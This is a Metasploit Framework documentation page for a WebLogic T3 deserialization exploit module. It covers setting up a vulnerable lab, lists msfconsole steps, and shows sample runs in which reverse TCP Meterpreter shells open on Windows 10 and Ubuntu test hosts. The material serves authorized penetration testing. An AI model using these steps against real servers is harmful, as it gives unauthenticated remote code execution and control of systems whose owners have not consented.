CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
Views: 11784

Vulnerable Application

There exists a Java object deserialization vulnerability in multiple versions of WebLogic.

Unauthenticated remote code execution can be achieved by sending a serialized BadAttributeValueExpException object over the T3 protocol to vulnerable WebLogic servers.

This module has been tested against versions v12.1.3.0.0, v12.2.1.3.0, and v12.2.1.4.0.

WebLogic versions can be downloaded from here.

Installation

Some version of Java 8 JDK is required to be installed on the server. This module has been tested successfully using jdk8u202 and jdk8u251.

Installation instructions for WebLogic can be found here.

On step 10 of the installation instructions, keep the Run Quickstart box checked and click done. A new window should pop up. Select Create a new domain -> next. Ensure Basic WebLogic Server Domain is selected and click next. Create credentials and select next. Domain mode can be either Production or Development, then click next. Click next again and select Create. Click next a couple more times, then click finish.

To start WebLogic, execute the startWebLogic script in Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/.

Verification Steps

  • Install the application

  • Start msfconsole

  • Do: use exploit/multi/misc/weblogic_deserialize_badattrval

  • Do: set RHOSTS <ip>

  • Do: run

  • You should get a meterpreter session.

Scenarios

WebLogic v12.2.1.4 on Windows 10

msf5 > use exploit/multi/misc/weblogic_deserialize_badattrval
msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.185
rhosts => 172.16.215.185
msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run

[*] Started reverse TCP handler on 172.16.215.1:4444
[*] 172.16.215.185:7001 - WebLogic version detected: 12.2.1.4.0
[*] 172.16.215.185:7001 - Sending handshake...
[*] 172.16.215.185:7001 - Formatting payload...
[*] 172.16.215.185:7001 - Sending object...
[*] Sending stage (176195 bytes) to 172.16.215.185
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.185:50795) at 2020-05-15 09:37:45 -0500

meterpreter > getuid
Server username: DESKTOP-AQT4EG1\space
meterpreter > sysinfo
Computer        : DESKTOP-AQT4EG1
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows

WebLogic v12.1.3.0.0 on Ubuntu 18.04 Linux

msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set target 1
target => 1
msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.196
rhosts => 172.16.215.196
msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[*] 172.16.215.196:7001 - WebLogic version detected: 12.1.3.0.0
[*] 172.16.215.196:7001 - Sending handshake...
[*] 172.16.215.196:7001 - Formatting payload...
[*] 172.16.215.196:7001 - Sending object...
[*] Sending stage (3012516 bytes) to 172.16.215.196
[*] Meterpreter session 6 opened (172.16.215.1:4444 -> 172.16.215.196:60672) at 2020-05-15 09:41:17 -0500
[*] 172.16.215.196:7001 - Command Stager progress - 101.36% done (820/809 bytes)

meterpreter > getuid
Server username: no-user @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo
Computer     : 172.16.215.196
OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux